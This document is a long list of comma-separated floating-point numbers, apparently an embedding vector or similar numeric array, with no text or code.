-0.018471837043762207, -0.008208000101149082, -0.016308605670928955, -0.0011180524015799165, -0.010885189287364483, 0.04961621016263962, -0.016001764684915543, 0.008614565245807171, -0.012473092414438725, 0.012457749806344509, 0.002755817025899887, -0.04231339320540428, -0.013539365492761135, 0.023902924731373787, -0.0007848421228118241, 0.023703478276729584, 0.01583300344645977, -0.0009991514962166548, -0.011130662634968758, 0.012864314951002598, -0.003829760942608118, -0.013646760024130344, -0.022644875571131706, -0.0171370767056942, -0.013600733131170273, -0.01888607256114483, -0.002078848658129573, 0.0036207253579050303, 0.012718564830720425, 0.0007373776170425117, -0.013631417416036129, 0.028597593307495117, -0.003453880548477173, -0.002000220585614443, -0.012427066452801228, 0.0015773552004247904, -0.021678326651453972, -0.02424044907093048, 0.0029149907641112804, -0.034488942474126816, -0.024516606703400612, 0.02890443429350853, -0.015618213452398777, -0.016768869012594223, -0.012219948694109917, 0.0016070804558694363, 0.010401914827525616, 0.01864059828221798, -0.003921813331544399, -0.026465047150850296, 0.03191147744655609, 0.014551941305398941, -0.04200655221939087, -0.001235035597346723, -0.02500755339860916, -0.008929077535867691, 0.005085892044007778, -0.0075252787210047245, 0.01469769049435854, 0.04473743960261345, -0.012028172612190247, 0.023657452315092087, -0.0010959982173517346, -0.022061876952648163, -0.010900530964136124, 0.003248680615797639, -0.0038738693110644817, 0.00389304687269032, 0.052991464734077454, -0.039183612912893295, 0.0042267367243766785, -0.006669959053397179, 0.007816777564585209, 0.0256826039403677, -0.012396382167935371, -0.021003276109695435, 0.00016037243767641485, -0.0010624374262988567, 0.024792764335870743, -0.020481646060943604, -0.0014805084792897105, 0.003969757352024317, -0.018272390589118004, -0.027753781527280807, -0.011337780393660069, -0.02525302581489086, -0.03338431566953659, -0.02402566187083721, 0.017321182414889336, 0.004943978041410446, 0.005561495665460825, 0.0016655720537528396, 0.027170782908797264, 0.007042004261165857, -0.013516352511942387, 0.004456867463886738, -0.018763335421681404, 0.0072414507158100605, 0.01618587039411068, 0.0027040375862270594, 0.005116575863212347, 0.00194652343634516, -0.007502265740185976, 0.02931866981089115, 0.041392870247364044, 0.03178874030709267, -0.03749598562717438, 0.016109159216284752, -0.010655058547854424, -0.013562378473579884, 0.006359282415360212, 0.03185011073946953, 0.0009627140825614333, -0.01166763436049223, 0.033445682376623154, 0.024716053158044815, 0.01828773133456707, 0.01359306275844574, 0.015756292268633842, 0.021187379956245422, -0.007885817438364029, -0.00984192918986082, 0.010570676997303963, -0.029763590544462204, -0.015004531480371952, 0.01741323433816433, 0.02686394192278385, 0.008392104879021645, -0.06127617508172989, -0.0027078730054199696, -0.010325204581022263, 0.01845649443566799, 0.008507170714437962, -0.004675491712987423, -0.0029073196928948164, -0.0017106393352150917, 0.022430086508393288, 0.0005427252617664635, 0.05753271281719208, -0.0077017126604914665, 0.02063506655395031, 0.003260187106207013, 0.0021478880662471056, -0.011583252809941769, 0.03092958591878414, -0.005638205911964178, -0.020957250148057938, -0.03369115665555, 0.0038777049630880356, -0.031098349019885063, -0.005611357279121876, -0.012235290370881557, 0.0038834582082927227, 0.0030780001543462276, -0.0054425946436822414, 0.01394592970609665, 0.0026503403205424547, -0.002142134588211775, -0.01962248980998993, -0.011920778080821037, 0.01850252039730549, -0.013853877782821655, -0.0024087028577923775, 0.0077017126604914665, -0.006965294014662504, -0.0239642933011055, -0.0020424113608896732, -0.011169017292559147, -0.0024796598590910435, 0.015035215765237808, -0.041853129863739014, -0.010064389556646347, 0.0032237498089671135, -0.020957250148057938, 0.014337152242660522, -0.010110415518283844, -0.02312047965824604, -0.0073833647184073925, 0.012488434091210365, -0.003522919723764062, -0.03076082468032837, -0.008675932884216309, 0.029870985075831413, 0.0948752760887146, 0.0003912224492523819, -0.020374251529574394, 0.004176875110715628, -0.006462841294705868, 0.016876261681318283, -0.009105511009693146, -0.0021287102717906237, 0.008767985738813877, 0.009980008006095886, 0.01965317502617836, 0.0037396263796836138, 0.009335641749203205, -0.008537854999303818, 0.005668890196830034, 0.012641854584217072, -0.013240194879472256, -0.013355260714888573, 0.012135567143559456, -0.021187379956245422, 0.022675560787320137, 0.0019867962691932917, 0.02301308512687683, -0.02557520940899849, 0.030745482072234154, -0.015579858794808388, -0.018333757296204567, -0.020681092515587807, -0.030960271134972572, -0.009036471135914326, -0.0013884560903534293, 0.016170527786016464, -0.0059028565883636475, -0.010632045567035675, 0.013002392835915089, -0.005757106933742762, 0.008837024681270123, 0.0032199141569435596, -0.014667006209492683, -0.027554333209991455, -0.00011266823275946081, -0.03246379271149635, -0.031481899321079254, 0.007375693880021572, -0.017812127247452736, -0.012166251428425312, 0.024654684588313103, -0.005339035764336586, -0.010716427117586136, 0.0052201347425580025, -0.0007421720074489713, -0.025529183447360992, 0.008852366358041763, 0.03390594571828842, -0.0007186794537119567, 0.0007311449153348804, 0.0015437945257872343, -0.018164996057748795, -0.012327342294156551, -0.01853320375084877, -0.00938933901488781, 0.007993211969733238, -0.0051932861097157, 0.005734093952924013, -0.002318568294867873, -0.023902924731373787, -0.037189144641160965, -0.008675932884216309, -0.00200597383081913, 0.02049698866903782, 0.008576209656894207, 0.021310117095708847, 0.010516979731619358, 0.005492456257343292, 0.00530835147947073, 0.026465047150850296, -0.011805713176727295, 0.00535054225474596, -0.028152674436569214, 0.007755409926176071, 0.03415141999721527, 0.03482646867632866, 0.009895626455545425, 0.023948950693011284, -0.027124756947159767, 0.032279688864946365, -0.008798670023679733, 0.010279177688062191, -0.02358074113726616, 0.010708755813539028, -0.016339290887117386, -0.000054865831771166995, 0.009220575913786888, 0.022506797686219215, 0.010785466060042381, 0.037680093199014664, 0.011146004311740398, -0.004514400381594896, -0.008614565245807171, -0.009665495716035366, 0.017612680792808533, -0.0023511701729148626, 0.030254535377025604, -0.006075454410165548, 0.0018314580665901303, 0.004357144236564636, -0.014329480938613415, 0.006171342451125383, 0.00854552537202835, -0.01986796408891678, -0.040441662073135376, -0.024670027196407318, -0.002362676663324237, -0.03125176951289177, 0.004153861664235592, -0.007870474830269814, 0.008790998719632626, 0.017858155071735382, -0.020450962707400322, -0.01646202616393566, -0.011115320026874542, -0.013071432709693909, 0.03605383262038231, -0.0121048828586936, -0.01629326492547989, 0.021816404536366463, 0.015817660838365555, -0.010049046948552132, 0.03949045389890671, 0.03952113911509514, 0.0283367782831192, 0.0022782953456044197, 0.00030995748238638043, -0.02855156734585762, 0.03519468009471893, -0.029195934534072876, 0.037434618920087814, 0.020757803693413734, 0.002755817025899887, -0.0008620318258181214, -0.009005787782371044, 0.02413305453956127, 0.012994722463190556, -0.00877565611153841, 0.0006606673123314977, 0.0012302411487326026, 0.03362978994846344, 0.003954415209591389, 0.008399776183068752, 0.0055384826846420765, -0.010309861972928047, -0.03243310749530792, 0.002878553466871381, 0.0239642933011055, -0.0065318807028234005, 0.014099350199103355, 0.009358654730021954, -0.01992933265864849, -0.008392104879021645, 0.00479822838678956, 0.014237429015338421, 0.004740695469081402, 0.01850252039730549, -0.008814011700451374, -0.007256792858242989, 0.030331246554851532, -0.0019810430239886045, -0.04473743960261345, -0.021555589511990547, -0.039214298129081726, 0.014076337218284607, 0.016860920935869217, -0.014199073426425457, 0.0244552381336689, 0.0256826039403677, 0.00428426917642355, -0.005208628252148628, -0.0024796598590910435, 0.031481899321079254, -0.01776610128581524, 0.005657383240759373, 0.019100861623883247, 0.0037798993289470673, -0.014828098006546497, 0.013708127662539482, -0.021877773106098175, -0.0035190843045711517, 0.020957250148057938, -0.028981145471334457, 0.021831747144460678, 0.0035478505305945873, 0.023304583504796028, -0.026848599314689636, 0.004268927499651909, -0.002308979630470276, -0.013408957980573177, -0.013623746111989021, -0.033752523362636566, -0.007057345937937498, 0.009420023299753666, -0.013570048846304417, 0.0008730589179322124, -0.01024849433451891, 0.003825925523415208, 0.0021037794649600983, -0.021463537588715553, -0.010217810049653053, 0.008959760889410973, 0.0007738149724900723, -0.011030938476324081, -0.027876516804099083, 0.012634184211492538, 0.011030938476324081, -0.00046841218136250973, 0.01779678650200367, 0.0017835141625255346, 0.003528672968968749, -0.033997997641563416, -0.018195679411292076, 0.01951509714126587, -0.011782699264585972, 0.02511494792997837, 0.009811244904994965, 0.005703409668058157, -0.0171370767056942, 0.008714288473129272, 0.03590041399002075, -0.02560589276254177, -0.02525302581489086, -0.0032851179130375385, -0.03240242227911949, -0.0018726898124441504, 0.011414490640163422, 0.029380038380622864, 0.0036609983071684837, -0.024746738374233246, 0.019960016012191772, 0.0007656645029783249, 0.006926938891410828, -0.033507052809000015, 0.013539365492761135, 0.00876031443476677, -0.0034979889169335365, -0.006102303043007851, -0.006255723536014557, -0.00028478691820055246, 0.017382550984621048, 0.019806595519185066, -0.010332874953746796, 0.018932098522782326, -0.021570932120084763, -0.01656942069530487, -0.012887327931821346, 0.009642482735216618, -0.006731327623128891, 0.028244726359844208, 0.012925682589411736, -0.005323693621903658, 0.008461144752800465, -0.0031853944528847933, 0.007939514704048634, -0.021187379956245422, -0.005074385087937117, -0.0013865383807569742, -0.011314766481518745, 0.04909458011388779, -0.0017624187748879194, -0.008039237931370735, 0.01135312207043171, 0.002226515905931592, 0.02298240177333355, -0.0022610356099903584, 0.008208000101149082, -0.016247238963842392, 0.0030626580119132996, -0.010961899533867836, 0.0011698318412527442, -0.020681092515587807, -0.010555335320532322, 0.0009612757712602615, -0.021908456459641457, 0.05458704009652138, 0.01123038586229086, -0.012534460052847862, 0.005246983375400305, -0.025345077738165855, -0.047560375183820724, 0.004974661860615015, -0.0074792527593672276, 0.002228433731943369, -0.0032659403514117002, -0.0009627140825614333, -0.007640344090759754, -0.024194423109292984, 0.011890093795955181, 0.00353442644700408, -0.015955738723278046, 0.04071781784296036, -0.0323103703558445, 0.01727515645325184, 0.02532973513007164, 0.008392104879021645, 0.01926962286233902, 0.010800807736814022, -0.007870474830269814, 0.012764591723680496, -0.007613495923578739, -0.02161695808172226, 0.010148770175874233, 0.0039429087191820145, 0.02683325670659542, -0.01727515645325184, 0.009504403918981552, -0.0430191271007061, 0.00691926758736372, -0.010041376575827599, -0.0042881048284471035, -0.004330295603722334, -0.010570676997303963, 0.004499058239161968, 0.002028987044468522, 0.003831678768619895, -0.03755735605955124, -0.0185638889670372, -0.009711521677672863, 0.005910527426749468, -0.0010212056804448366, 0.006083125714212656, -0.0001481467334087938, -0.0163546334952116, 0.032279688864946365, 0.012910340912640095, 0.03316952660679817, -0.004805899225175381, -0.00884469598531723, -0.016998998820781708, 0.007042004261165857, 0.009481390938162804, -0.011928449384868145, 0.008737301453948021, -0.03927566483616829, 0.03436620905995369, -0.001959947869181633, -0.005105069372802973, 0.03051535040140152, -0.0034308675676584244, 0.004311117809265852, -0.0038642806466668844, -0.0033771703019738197, -0.014528927393257618, -0.03051535040140152, 0.010754781775176525, 0.0040656449273228645, 0.020834513008594513, 0.012933353893458843, 0.008906063623726368, -0.0040848227217793465, 0.010977242141962051, 0.009657824411988258, -0.023135822266340256, -0.016937630251049995, 0.007429391145706177, -0.01273390743881464, 0.00011128983896924183, 0.0024259628262370825, 0.0008318271720781922, -0.012519118376076221, 0.009611798450350761, 0.007916501723229885, -0.02718612551689148, -0.012097211554646492, 0.015587530098855495, 0.006712149828672409, -0.0005384103278629482, -0.021816404536366463, 0.006846392992883921, 0.026572441682219505, -0.02104930207133293, -0.027278177440166473, 0.020098093897104263, 0.008369091898202896, 0.008138961158692837, -0.002677188953384757, 0.0010720262071117759, -0.04271228611469269, 0.01243473682552576, -0.01902415044605732, -0.004970826208591461, -0.016231896355748177, -0.00895209051668644, 0.0032103254925459623, 0.004656314384192228, 0.008752643130719662, 0.04749900847673416, 0.001238871132954955, 0.007333503104746342, 0.016032449901103973, 0.0034289497416466475, -0.019852621480822563, 0.00475603761151433, 0.019453728571534157, 0.003530590794980526, -0.008906063623726368, 0.01954578049480915, -0.010662729851901531, 0.008307723328471184, -0.02694065123796463, -0.023519372567534447, 0.04516701400279999, -0.010992583818733692, 0.028106648474931717, -0.01277226209640503, 0.01913154497742653, -0.01068574283272028, -0.012388710863888264, -0.0017902262043207884, -0.020343568176031113, 0.0020596710965037346, 0.00188707304187119, 0.006493525579571724, -0.004644807893782854, -0.0037319553084671497, -0.010693413205444813, -0.0484195314347744, 0.0056612188927829266, -0.030039748176932335, 0.012703223153948784, -0.012741577811539173, -0.0025371925439685583, 0.005668890196830034, -0.0068770768120884895, 0.008798670023679733, 0.01341662835329771, -0.0018669365672394633, 0.014199073426425457, 0.00963481143116951, -0.005668890196830034, -0.009450706653296947, -0.0066047552973032, -0.008269368670880795, 0.016508053988218307, -0.01415304746478796, 0.0016483122017234564, 0.023550057783722878, -0.0008989486377686262, -0.008798670023679733, -0.004487551748752594, 0.0014335234882310033, -0.0014805084792897105, -0.013431970961391926, 0.02115669660270214, 0.0028651291504502296, 0.0032774468418210745, 0.02312047965824604, -0.00636695371940732, -0.010118086822330952, 0.023074453696608543, 0.012641854584217072, -0.014843439683318138, -0.0022188450675457716, -0.000739774783141911, -0.021218065172433853, 0.02519165724515915, 0.00487110298126936, 0.02227666601538658, 0.009151536971330643, -0.002677188953384757, 0.0005983402370475233, -0.004863432142883539, -0.025529183447360992, 0.014521257020533085, -0.014452217146754265, 0.011483529582619667, -0.0045719328336417675, 0.00833840761333704, -0.01730583980679512, -0.012304329313337803, -0.014950834214687347, 0.01976056955754757, -0.005312187131494284, 0.018901413306593895, 0.005691903177648783, -0.005492456257343292, 0.0075252787210047245, -0.006240381393581629, 0.017919521778821945, 0.010003020986914635, 0.012365697883069515, 0.020067410543560982, 0.002393360948190093, -0.0009631934808567166, -0.003758803941309452, -0.01482042670249939, 0.006600920110940933, 0.017720075324177742, 0.012373369187116623, 0.01536506973206997, 0.02104930207133293, 0.021954484283924103, -0.006002579815685749, -0.0001522219681646675, -0.015280688181519508, 0.0029188264161348343, 0.0027155440766364336, 0.022890347987413406, 0.002385689876973629, -0.006907761096954346, 0.013562378473579884, 0.009987679310142994, -0.009182221256196499, 0.0020615889225155115, -0.012358026579022408, -0.008806340396404266, 0.007176246959716082, 0.004069480579346418, 0.0140686659142375, -0.007878146134316921, 0.005262325517833233, -0.016906946897506714, -0.019392360001802444, 0.009458377957344055, 0.020926564931869507, -0.0022591177839785814, -0.005876007955521345, -0.0049976748414337635, 0.017919521778821945, 0.01413770578801632, 0.012549802660942078, -0.020021384581923485, 0.0017787197139114141, -0.001167914131656289, -0.007103372365236282, -0.005105069372802973, -0.021494220942258835, 0.0071187145076692104, 0.008767985738813877, 0.02413305453956127, -0.01825704798102379, 0.001840087934397161, -0.01845649443566799, 0.011798041872680187, 0.0061675067991018295, -0.009105511009693146, 0.018164996057748795, -0.0009267561254091561, -0.006301749963313341, 0.009972336702048779, -0.0029303329065442085, -0.02494618482887745, 0.0016742019215598702, 0.0071187145076692104, -0.0032716935966163874, -0.0020692599937319756, -0.03002440556883812, 0.006574071478098631, 0.0016780374571681023, -0.013462655246257782, -0.008629906922578812, -0.004729188978672028, 0.01488946657627821, -0.007540620863437653, -0.013807850889861584, 0.02014411985874176, 0.0008821682422421873, -0.0039083887822926044, 0.01758199743926525, 0.0014153047231957316, -0.003965921700000763, -0.0038412674330174923, -0.023626767098903656, -0.005162602290511131, -0.0018707721028476954, -0.00896743219345808, 0.023764846846461296, -0.013807850889861584, -0.003444291651248932, -0.009665495716035366, -0.009604127146303654, 0.013493338599801064, -0.007855133153498173, 0.023151163011789322, 0.0019340580329298973, -0.014950834214687347, -0.003329226281493902, -0.007206931244581938, -0.029057854786515236, 0.019070176407694817, -0.006420650985091925, -0.02374950423836708, -0.0054579367861151695, 0.004775215405970812, 0.021494220942258835, -0.003829760942608118, -0.01147585827857256, 0.0029380039777606726, -0.015848344191908836, -0.019315648823976517, -0.011422161012887955, -0.003753050696104765, 0.010593689978122711, 0.006459006108343601, 0.010662729851901531, -0.020788487046957016, -0.0129640381783247, 0.013501009903848171, 0.0031355328392237425, 0.01222761906683445, -0.01415304746478796, -0.006781189236789942, -0.018717309460043907, 0.009489062242209911, -0.014130034483969212, -0.0002488289901521057, -0.01024849433451891, -0.0036207253579050303, -0.009304957464337349, 0.002945674816146493, -0.008998116478323936, -0.02014411985874176, -0.03881540521979332, 0.014037981629371643, 0.016308605670928955, -0.003246762789785862, 0.011805713176727295, 0.0021363813430070877, -0.007532950025051832, -0.023273900151252747, -0.002719379495829344, -0.000019417289877310395, 0.0034788113553076982, 0.01057834830135107, 0.026434363797307014, 0.011468187905848026, 0.02970222197473049, -0.006834886502474546, 0.01916222833096981, -0.0035766169894486666, -0.020312882959842682, -0.0015131103573367, -0.02210790477693081, -0.00045666590449400246, -0.003822089871391654, 0.004832747858017683, 0.011322437785565853, -0.020957250148057938, -0.004153861664235592, 0.02137148566544056, -0.015180964954197407, -0.013431970961391926, 0.01133010908961296, 0.0039237309247255325, 0.022169271484017372, -0.0012618842301890254, 0.014199073426425457, 0.010724097490310669, -0.015610543079674244, 0.003160463646054268, -0.00915920827537775, 0.0027654056902974844, 0.01976056955754757, 0.013393615372478962, 0.010033705271780491, -0.013815522193908691, 0.015058228746056557, 0.0021919964347034693, -0.000702378514688462, 0.002861293498426676, 0.023028427734971046, 0.008254026994109154, 0.02123340591788292, 0.00719158910214901, -0.00016432780830655247, -0.012718564830720425, 0.010033705271780491, -0.005400403868407011, 0.005565331317484379, -0.012181593105196953, -0.0035977123770862818, -0.007164740469306707, 0.0038642806466668844, 0.0003205051471013576, -0.015188636258244514, 0.0040042768232524395, -0.0042881048284471035, 0.00393140222877264, -0.01555684581398964, -0.01877867802977562, 0.0028708823956549168, 0.00004890280615654774, -0.006662288215011358, 0.00243555149063468, 0.006811873055994511, 0.017244471237063408, -0.018824703991413116, -0.014122363179922104, -0.05019921064376831, -0.014459888450801373, 0.006788860075175762, -0.00767102837562561, -0.002168983221054077, 0.00267527112737298, -0.007678699679672718, 0.006236546207219362, 0.010279177688062191, -0.018241705372929573, 0.0132095105946064, 0.018901413306593895, 0.00013244510046206415, 0.002821020781993866, -0.016262579709291458, 0.01513493899255991, -0.00017583435692358762, 0.009926310740411282, -0.004276598338037729, -0.0016070804558694363, 0.013324576430022717, 0.012473092414438725, -0.017996232956647873, 0.020543014630675316, -0.015510819852352142, -0.005653548054397106, 0.010793137364089489, -0.0030933422967791557, -0.021801061928272247, 0.00907482672482729, 0.008576209656894207, -0.010563005693256855, -0.018088284879922867, -0.03537878394126892, -0.005776284262537956, 0.0220005102455616, 0.01951509714126587, 0.03335363045334816, -0.008576209656894207, -0.000019492203136906028, 0.0053620487451553345, 0.0011573664378374815, -0.01383853517472744, -0.01594039797782898, 0.009450706653296947, 0.03611520305275917, 0.011567911133170128, 0.008514841087162495, -0.00018098832515534014, 0.013447312638163567, -0.0036360675003379583, -0.004545084200799465, 0.006313256453722715, -0.019852621480822563, 0.02014411985874176, -0.01954578049480915, 0.0027596524450927973, -0.005879843141883612, 0.019238939508795738, 0.011782699264585972, -0.004276598338037729, 0.01136846374720335, -0.002541028195992112, 0.0036418207455426455, -0.008860037662088871, -0.00044467992847785354, 0.017597340047359467, 0.02235337719321251, 0.0034557983744889498, 0.011322437785565853, 0.001505439286120236, 0.004073316231369972, -0.027201466262340546, -0.02252214029431343, -0.018103627488017082, 0.006597084458917379, -0.0061061386950314045, 0.02620423398911953, -0.02227666601538658, -0.0048097348771989346, 0.002243775874376297, 0.00783595535904169, -0.021524906158447266, 0.003033891785889864, -0.009366326034069061, 0.008169645443558693, -0.012465421110391617, -0.0063899667002260685, 0.004556590691208839, 0.029103882610797882, 0.0028421159368008375, 0.008683604188263416, 0.017704732716083527, 0.005208628252148628, -0.02704804576933384, 0.010770123451948166, 0.0042267367243766785, -0.013600733131170273, -0.003898800117895007, -0.007908830419182777, -0.020972590893507004, -0.003463469445705414, 0.0027232151478528976, -0.018349099904298782, -0.021279433742165565, -0.0040656449273228645, -0.013148142956197262, 0.0011075047077611089, 0.013117458671331406, 0.0070189908146858215, 0.0141683891415596, 0.01101559679955244, -0.0034212786704301834, 0.00125900749117136, 0.004295776132494211, -0.01266486756503582, 0.011636950075626373, -0.03338431566953659, -0.007011319976300001, 0.014567282982170582, -0.0004343719920143485, -0.014659334905445576, 0.013853877782821655, 0.03335363045334816, -0.003760721767321229, -0.0013213346246629953, 0.005549989175051451, 0.00017427618149667978, -0.008921406231820583, 0.00037132573197595775, -0.011767357587814331, 0.009926310740411282, -0.0064513348042964935, 0.017842812463641167, -0.0030645758379250765, -0.013140471652150154, 0.01968385837972164, 0.003386758966371417, -0.012058856897056103, -0.01482042670249939, -0.002803760813549161, -0.004104000050574541, -0.02483879029750824, -0.02350403182208538, 0.024900158867239952, -0.014375506900250912, 0.011299424804747105, 0.013884561136364937, -0.006336269434541464, 0.01198214665055275, -0.010816150344908237, -0.009673167020082474, -0.008698945865035057, -0.0031432039104402065, -0.010770123451948166, 0.004468373954296112, -0.0004849528195336461, -0.01629326492547989, 0.009519746527075768, 0.022859664633870125, -0.011506542563438416, 0.015081241726875305, -0.02991701103746891, -0.007252957206219435, 0.0015668075066059828, 0.01804225891828537, 0.0024297982454299927, 0.006712149828672409, -0.02964085340499878, -0.0011928449384868145, -0.0071340566501021385, -0.0007627878803759813, -0.0031412860844284296, -0.024746738374233246, 0.0004859117034357041, 0.01348566822707653, -0.006516538560390472, 0.014360165223479271, 0.019284965470433235, -0.003946743905544281, 0.011222714558243752, -0.009021129459142685, -0.021003276109695435, -0.015817660838365555, 0.00984192918986082, 0.01536506973206997, 0.015925055369734764, 0.008238684386014938, -0.01187475211918354, -0.005688067525625229, -0.00907482672482729, 0.01120737288147211, 0.00896743219345808, -0.014835769310593605, -0.0013999626971781254, -0.015786975622177124, 0.01758199743926525, -0.006225039716809988, 0.03065343014895916, 0.03283200040459633, 0.00447604525834322, -0.006393802352249622, 0.003977428190410137, 0.004990004003047943, 0.010171784088015556, 0.013232523575425148, -0.01543410960584879, -0.0059028565883636475, 0.02582068182528019, 0.00896743219345808, 0.026848599314689636, -0.001442153356038034, -0.010609032586216927, -0.006006415467709303, 0.009611798450350761, -0.00032913507311604917, 0.025022894144058228, -0.003375252475962043, -0.0028497870080173016, 0.01469769049435854, -0.002803760813549161, -0.023458003997802734, -0.014107021503150463, -0.010946557857096195, 0.02112601138651371, 0.010693413205444813, 0.006447499617934227, 0.017812127247452736, -0.0027922543231397867, 0.005385061725974083, -0.01231200061738491, 0.021202722564339638, -0.015602871775627136, 0.0018544711638242006, -0.01825704798102379, -0.00938933901488781, 0.0016972150187939405, 0.013654430396854877, 0.011529555544257164, -0.024271134287118912, 0.0036916823592036963, 0.00479822838678956, -0.006113809533417225, -0.01811896823346615, -0.0005130000063218176, -0.0024317160714417696, -0.010003020986914635, -0.0030147142242640257, -0.007268299348652363, -0.029364697635173798, -0.032249003648757935, -0.002732803812250495, 0.004836583510041237, 0.009657824411988258, -0.0035823702346533537, 0.024884816259145737, -0.01543410960584879, -0.00648201908916235, -0.013470325618982315, -0.022230640053749084, -0.004552755504846573, -0.007947185076773167, -0.0081773167476058, 0.025452472269535065, -0.03366047143936157, -0.014858782291412354, -0.02644970640540123, 0.021172039210796356, 0.008599222637712955, -0.010110415518283844, 0.00009043423051480204, -0.010961899533867836, -0.01646202616393566, -0.011046281084418297, 0.012242961674928665, -0.0007642261916771531, -0.005806968547403812, 0.007709383498877287, -0.01695297285914421, -0.016998998820781708, 0.007625002413988113, 0.012020501308143139, -0.01509658433496952, 0.0028421159368008375, 0.010869847610592842, -0.016093818470835686, -0.00566505454480648, -0.014705361798405647, -0.022921033203601837, -0.024409212172031403, -0.016830235719680786, 0.0010691495845094323, 0.0034059365279972553, 0.012235290370881557, -0.009665495716035366, -0.001883237506262958, -0.009818916209042072, 0.016738183796405792, 0.008683604188263416, 0.02554452419281006, 0.0034212786704301834, 0.008269368670880795, 0.0010125756962224841, 0.01521932054311037, -0.02623491734266281, -0.004376321565359831, -0.02091122418642044, -0.005592179950326681, -0.007751574274152517, 0.004928635898977518, -0.0004494743188843131, 0.003595794551074505, 0.029717564582824707, -0.013531694188714027, -0.0010883271461352706, 0.0000939700985327363, 0.00416920380666852, -0.02672586217522621, 0.00017475562344770879, 0.012848972342908382, 0.010693413205444813, -0.009258931502699852, 0.00747158145532012, -0.0034845646005123854, -0.0009195645106956363, -0.005879843141883612, 0.0009013458620756865, -0.0037281198892742395, -0.03387526050209999, -0.03026987798511982, -0.01965317502617836, 0.010516979731619358, -0.02308979630470276, 0.0055001275613904, -0.005177943967282772, 0.02098793350160122, -0.00044899489148519933, -0.005480949766933918, 0.008514841087162495, -0.00019429276289884, 0.0021210394334048033, -0.0015370823675766587, 0.012802946381270885, 0.0036571628879755735, 0.006777353584766388, 0.003879622556269169, -0.0030933422967791557, -0.02246077172458172, 0.011023268103599548, -0.01017945446074009, -0.004552755504846573, -0.005918198265135288, 0.0005666972137987614, -0.002590889809653163, -0.0056458767503499985, -0.00007227547030197456, 0.007521443534642458, -0.020328225567936897, -0.02999372035264969, 0.005642041563987732, -0.0038738693110644817, 0.012250632047653198, 0.00691926758736372, -0.01733652502298355, -0.003885375801473856, -0.013708127662539482, -0.009166878648102283, -0.007176246959716082, 0.016554079949855804, 0.014682348817586899, -0.0014968094183132052, -0.017919521778821945, -0.007168576121330261, -0.03073013946413994, 0.03703572601079941, 0.0035114132333546877, 0.009021129459142685, -0.019607149064540863, 0.0032429273705929518, 0.010915873572230339, -0.015395754016935825, 0.0025467814411967993, -0.012097211554646492, 0.008123619481921196, 0.006600920110940933, -0.019330991432070732, 0.0037166131660342216, 0.02756967581808567, 0.002023233799263835, 0.0014037982327863574, 0.004978497512638569, 0.011598595418035984, 0.004341802094131708, 0.01706036739051342, 0.015817660838365555, -0.005534647032618523, 0.016201211139559746, 0.005135753657668829, -0.005062878597527742, -0.008806340396404266, -0.016369974240660667, 0.0023032263852655888, 0.011383806355297565, -0.008837024681270123, -0.027278177440166473, -0.002471989020705223, 0.004947813227772713, 0.015925055369734764, 0.01068574283272028, -0.007364187389612198, 0.011836396530270576, -0.001093121594749391, 0.007655686233192682, -0.0005748476833105087, -0.009373996406793594, -0.008606893941760063, -0.002234186977148056, 0.002884306712076068, -0.004184545949101448, -0.004533577710390091, -0.019637832418084145, -0.007751574274152517, -0.014835769310593605, 0.003988934680819511, -0.029579484835267067, 0.013876890763640404, -0.03455031290650368, 0.021494220942258835, -0.0002294117002747953, -0.003189230104908347, -0.014252770692110062, -0.009811244904994965, -0.006708314176648855, 0.013784837909042835, -0.04019618779420853, 0.005120411515235901, -0.024762079119682312, -0.029057854786515236, 0.025805339217185974, 0.0025659590028226376, 0.0005700532929040492, 0.0026925308629870415, -0.004395499359816313, -0.004403170198202133, -0.010332874953746796, -0.00907482672482729, -0.006493525579571724, 0.016768869012594223, 0.010309861972928047, -0.024332502856850624, 0.014559611678123474, -0.009373996406793594, -0.034734416753053665, 0.002230351557955146, 0.006121480837464333, -0.03384457901120186, 0.006501196417957544, 0.0022456934675574303, -0.0166001059114933, 0.011713660322129726, 0.0042881048284471035, -0.013976613990962505, -0.004648643080145121, 0.024286476895213127, -0.0033656638115644455, 0.00915920827537775, -0.0026349981781095266, 0.0007321037701331079, 0.0005700532929040492, -0.00982658751308918, -0.021202722564339638, -0.001812280504964292, 0.016630789265036583, -0.006773517932742834, -0.000019701958080986515, 0.0023262393660843372, 0.00275389919988811, -0.023074453696608543, 0.023810872808098793, 0.0044913869351148605, 0.027416255325078964, 0.006505032069981098, 0.00589518528431654, 0.0009214822784997523, -0.007502265740185976, 0.002541028195992112, -0.000060409347497625276, 0.008146632462739944, -0.008046909235417843, 0.00208460190333426, -0.01643134281039238, 0.0013433888088911772, -0.023810872808098793, 0.016093818470835686, 0.003965921700000763, -0.0025755479000508785, -0.015211649239063263, 0.0018257048213854432, 0.02494618482887745, -0.001266678562387824, -0.003827843116596341, -0.016876261681318283, -0.0021363813430070877, 0.026188891381025314, 0.019146887585520744, 0.009972336702048779, -0.007625002413988113, -0.005116575863212347, -0.012365697883069515, -0.01597108133137226, 0.012825959362089634, 0.005998744163662195, 0.0036514096427708864, 0.010900530964136124, 0.013930588029325008, 0.008913734927773476, 0.004015783313661814, -0.012971709482371807, 0.008507170714437962, -0.01045561209321022, 0.008714288473129272, -0.0017931029433384538, 0.005285338498651981, 0.005392733030021191, 0.013754153624176979, -0.013723470270633698, -0.005546153523027897, 0.0018573477864265442, -0.018548546358942986, 0.002521850634366274, -0.019607149064540863, 0.00018877921684179455, 0.0028286916203796864, -0.0023166504688560963, 0.023197190836071968, 0.008154302835464478, -0.011084635742008686, 0.01850252039730549, 0.016738183796405792, 0.010294520296156406, -0.008898393251001835, 0.004844254348427057, 0.0052546546794474125, 0.001487220637500286, -0.00216322997584939, -0.0025640411768108606, -0.010463282465934753, 0.0012436654651537538, -0.003091424470767379, -0.014973847195506096, 0.017888838425278664, 0.01733652502298355, 0.008514841087162495, 0.022798296064138412, 0.014551941305398941, -0.009427693672478199, 0.01716776192188263, 0.01191310677677393, -0.010095073841512203, 0.0020558356773108244, 0.011537226848304272, 0.000007322685632971115, 0.006681465543806553, -0.019392360001802444, 0.004407005850225687, 0.0036533272359520197, 0.0006151205743663013, 0.0129640381783247, -0.024409212172031403, -0.007770751602947712, 0.00810827687382698, -0.006313256453722715, 0.000702378514688462, 0.011391477659344673, -0.023166505619883537, 0.020619723945856094, 0.023289242759346962, 0.01459029596298933, -0.02000604197382927, -0.006056277081370354, 0.014421533793210983, 0.0017844729591161013, 0.008131289854645729, -0.0076058246195316315, -0.005135753657668829, 0.0025448636151850224, 0.005856830161064863, -0.006566400174051523, -0.003275529248639941, -0.002648422494530678, 0.00021107314387336373, 0.007145563140511513, -0.016400659456849098, 